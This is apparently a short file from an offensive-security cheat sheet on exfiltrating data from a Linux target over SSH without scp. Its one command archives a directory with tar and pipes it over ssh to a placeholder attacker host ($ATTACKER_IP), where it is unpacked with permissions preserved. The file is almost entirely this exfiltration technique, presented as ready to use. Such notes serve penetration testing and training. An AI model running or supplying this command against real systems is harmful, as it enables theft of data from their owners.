killchain-compendium/exfiltration/linux/ssh.md

229 B

SSH Exfiltration

  • Given: without scp

Compress

  • Archive the data on target, send it to the attacker. Unpack including preserved permissions
tar cf - <directory> | ssh user@$ATTACKER_IP "cd /tmp/; tar xpf -"